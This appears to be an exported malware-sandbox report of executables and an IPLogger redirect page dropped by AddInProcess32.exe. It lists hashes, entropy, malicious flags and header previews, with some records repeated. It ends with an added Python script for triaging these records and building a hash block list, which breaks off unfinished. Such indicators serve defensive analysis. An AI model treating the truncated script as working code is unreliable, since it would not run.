                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5387648
                                                                                                                                                                                                                                Entropy (8bit):6.884111372618492
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:n0NF76666666666666666666666666666666x666666666666666fwwwwwwwwwwa:KPMki6zio75L3pf3dedO4keCIwkoYbg6
                                                                                                                                                                                                                                MD5:0D0FD9337DBAAF6B07C1274D7584A900
                                                                                                                                                                                                                                SHA1:D6106F6BAAA23AE32467927676B81BB6BA054952
                                                                                                                                                                                                                                SHA-256:3A1D6A0F8676D610918206765E4264252BA5433580CF578A6DD259EEF4B43F35
                                                                                                                                                                                                                                SHA-512:BED1882BBF3A4BF733C1B864EB22B5AEF8EF35C6BAF8E5EE52D3B259E3D65D2E63A11999D19727C663F57F3C39BC25640D2C2C5FEE88ACDA93DD6DB1DD05F7ED
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R.....V.R...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4407808
                                                                                                                                                                                                                                Entropy (8bit):7.9915034437777726
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:98304:e58vmrQB/A24LDjFO07zDJHBSswWbdIM9F4AoP829ni+tiCCb:e5IB/A241ttEkIO4AoU2ZvnCb
                                                                                                                                                                                                                                MD5:3953BBAD77CDCB9D5AF2694EED7E6688
                                                                                                                                                                                                                                SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
                                                                                                                                                                                                                                SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
                                                                                                                                                                                                                                SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....^.................@......................................C... ..............................................................6...%s.................................................(.......................`............................MPRESS1..........@......................MPRESS2..............@..................rsrc....6.......8....A.............@..............................................................v2.19z...@. ..l...m.....:.m...|'*..c.k.X.........;.}Z....c.4...q..s......E...s.Z.:.+..........wj7..r.W.@J4.k.&.N.._.AZ..%|xu..}..u...u.]..\.H..c3\..d.l..\...xq|...zg....._.9?.rs.H..b0I.+.....7..'...O..K@.i...2....8.T.FC]..y.7a d...j)^".P....'7..Ey..p.......g.Ol.U.....@...+.5..-.....(..=bVr.z.L..........d.0.qM....`*.W..;Q P..^.9.&.(..S}7.Z3...Q..0.n<.B\.O.<(~..%..@....C.....3........sG...^T.U. _...vQp......g7..b..Dm......9E.`.p..Sn*p..b..4.|FUT..AWOs.........a.
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5387648
                                                                                                                                                                                                                                Entropy (8bit):6.884111685885652
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:o0NF76666666666666666666666666666666x666666666666666fwwwwwwwwwwU:/PMki6zio75L3pf3dedO4keCIwkoYbg0
                                                                                                                                                                                                                                MD5:E0BF1571C9F5695C2404834EF8DA041F
                                                                                                                                                                                                                                SHA1:C95F6D22A3F04AC37D7BCDA64D5B80C4A227D1D6
                                                                                                                                                                                                                                SHA-256:63AF99AFD5A9200656335EDDF11C8D7F5685FD63A27BC00FD99588C16FF73040
                                                                                                                                                                                                                                SHA-512:78AE9C60D2513B3C27D2AA043FC94FF1A998020A0897A9D4C8281CEE95AC3C8C887D3ED979F7DDF2DFB9D60BDF90C6363C23131D4D2BF40A6C71448767451599
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R......:R...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4405128
Entropy (8bit):7.969340138439332
Encrypted:false
SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
MD5:F6C9E6F8396274E57FBA6BE593B90E36
SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):473089
Entropy (8bit):7.146087505769809
Encrypted:false
SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
MD5:CCEE6D525CB5940F123C86DB6EDD40DA
SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4407808
                                                                                                                                                                                                                                Entropy (8bit):7.9915034437777726
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:98304:e58vmrQB/A24LDjFO07zDJHBSswWbdIM9F4AoP829ni+tiCCb:e5IB/A241ttEkIO4AoU2ZvnCb
                                                                                                                                                                                                                                MD5:3953BBAD77CDCB9D5AF2694EED7E6688
                                                                                                                                                                                                                                SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
                                                                                                                                                                                                                                SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
                                                                                                                                                                                                                                SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....^.................@......................................C... ..............................................................6...%s.................................................(.......................`............................MPRESS1..........@......................MPRESS2..............@..................rsrc....6.......8....A.............@..............................................................v2.19z...@. ..l...m.....:.m...|'*..c.k.X.........;.}Z....c.4...q..s......E...s.Z.:.+..........wj7..r.W.@J4.k.&.N.._.AZ..%|xu..}..u...u.]..\.H..c3\..d.l..\...xq|...zg....._.9?.rs.H..b0I.+.....7..'...O..K@.i...2....8.T.FC]..y.7a d...j)^".P....'7..Ey..p.......g.Ol.U.....@...+.5..-.....(..=bVr.z.L..........d.0.qM....`*.W..;Q P..^.9.&.(..S}7.Z3...Q..0.n<.B\.O.<(~..%..@....C.....3........sG...^T.U. _...vQp......g7..b..Dm......9E.`.p..Sn*p..b..4.|FUT..AWOs.........a.
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5387648
                                                                                                                                                                                                                                Entropy (8bit):6.884112617188526
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:J0NF76666666666666666666666666666666x666666666666666fwwwwwwwwwwv:cPMki6zio75L3pf3dedO4keCIwkoYbgP
                                                                                                                                                                                                                                MD5:4000388D97FD96DA5DFAA35BDAF6BED2
                                                                                                                                                                                                                                SHA1:F32B111298B0C4DC0BAF1DC928090024491952A2
                                                                                                                                                                                                                                SHA-256:673EA1BDB250EC7D59D9F0158C925173AFE99A5CED13601D29C75F494FFEF092
                                                                                                                                                                                                                                SHA-512:34BC638C760ACB83AC38C8384FDAF3AE44702970DF3F54AB2D82DD1DF98FBA4AAAC85D19683812DE25529FE856EB75C9184743A3DB594FCFC7C5BC3B80B421B5
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R......OR...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
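The rows above are what an analyst actually gets when a sandbox page like this one is exported: one key:value line per field, a SHA-256 per dropped file, an 8-bit entropy figure, and a printable preview of the first bytes with non-printable bytes shown as dots. As an added example (not part of the Joe Sandbox report or its tooling), the following Python script triages such records: it parses them, reads the MZ/PE signature and machine field out of the preview to confirm architecture, flags the MPRESS section names and high entropy that mark the packed PE32+ file, notes the HTML document dropped where a payload was expected (the IPLogger redirect page behind the "Creates HTML files with .exe extension" signature), groups identical payloads dropped more than once by SHA-256, and emits a block list of the hashes the sandbox marked malicious. The sample records are constructed from the rows on this page with fields trimmed and previews truncated; the key:value export layout, the 7.9 entropy cut-off and all function names are assumptions.

```python
import math
import re
from collections import Counter, defaultdict

PACKED_ENTROPY = 7.9  # assumed cut-off: at or above this a dropped file is treated as packed/encrypted
# Constructed sample: four dropped-file rows from this report, flattened to the
# key:value lines the page is exported in (fields trimmed, previews truncated; a
# record starts at each "Process:" line). The layout is an assumption; values are from the rows above.
SAMPLE_RECORDS = '''\
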